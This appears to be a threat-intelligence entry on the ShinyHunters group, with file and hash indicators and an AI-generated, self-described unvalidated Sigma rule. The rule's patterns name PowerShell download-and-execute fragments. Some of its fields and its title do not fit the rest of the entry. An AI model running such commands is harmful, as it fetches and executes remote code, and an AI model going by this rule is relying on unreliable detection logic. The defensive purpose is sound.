Threat Actor Unknown origin
ShinyHunters
IoCs CSV
1 detection rule
ShinyHunters is a cybercriminal group of unknown origin that is motivated by financial gain. The group is known for its sophisticated attacks against a wide range of targets, including businesses, organizations, and government agencies. ShinyHunters typically uses phishing attacks and exploit kits to gain access to victim networks, where they deploy malware to steal sensitive data, such as names, addresses, phone numbers, Social Security numbers, and credit card information.
Indicators of Compromise 12
Filename SECOH-QAD.exe Filename VID001.exe Filename f_000cd7.html Filename u992574.dll MD5 2915b3f8b703eb744fc54c81f4a9c67f MD5 38de5b216c33833af710e88f7f64fc98 MD5 bf9672ec85283fdf002d83662f0b08b7 MD5 dbd8dbecaa80795c135137d69921fdba SHA-256 9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f SHA-256 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 SHA-256 c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe SHA-256 e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba
Detection Rules
ShinyHunters_SIGMA_Detection
sigma ai_generated
title: ShinyHunters Credential Harvesting via Fortinet Vulnerabilities and Fileless Phantom Stealer
id: 3a8d5e1b-9d2e-4c3a-8f1d-4b2a9c7e6b8f
status: experimental
logsource:
category: process_creation
product: windows
detection:
selection_img_load:
- ImageLoaded|endswith: '\VID001.exe'
- ImageLoaded|endswith: '\SECOH-QAD.exe'
- ImageLoaded|endswith: '\u992574.dll'
selection_cmd_host:
- CommandLine|contains: 'powershell -ep bypass -c'
- CommandLine|contains: 'iex(new-object net.webclient)'
- CommandLine|contains: 'Invoke-PhantomStealer'
- ParentImage|endswith: '\cmd.exe'
- ParentImage|endswith: '\cscript.exe'
selection_temp_webfile:
- TargetFilename|endswith: '\AppData\Local\Temp\f_000cd7.html'
- TargetFilename|contains: 'f_000cd7.html'
selection_hashes:
- hash_sha256: '9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507'
- hash_md5: '2915b3f8b703eb744fc54c81f4a9c67f'
- hash_sha256: 'c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe'
- hash_md5: 'bf9672ec85283fdf002d83662f0b08b7'
- hash_sha256: '9896a6fcb9bb5ac1ec5297b4a65be3f647589adf7c37b45f3f7466decd6a4a7f'
- hash_md5: '38de5b216c33833af710e88f7f64fc98'
- hash_sha256: 'e60ab99da105ee27ee09ea64ed8eb46d8edc92ee37f039dbc3e2bb9f587a33ba'
- hash_md5: 'dbd8dbecaa80795c135137d69921fdba'
condition: 1 of selection_*
falsepositives:
- Legitimate administrative scripts (unlikely but possible)
- Unauthorized software deployment
level: critical ⚠ Rules are AI-generated and unvalidated. Test in a safe environment before production use.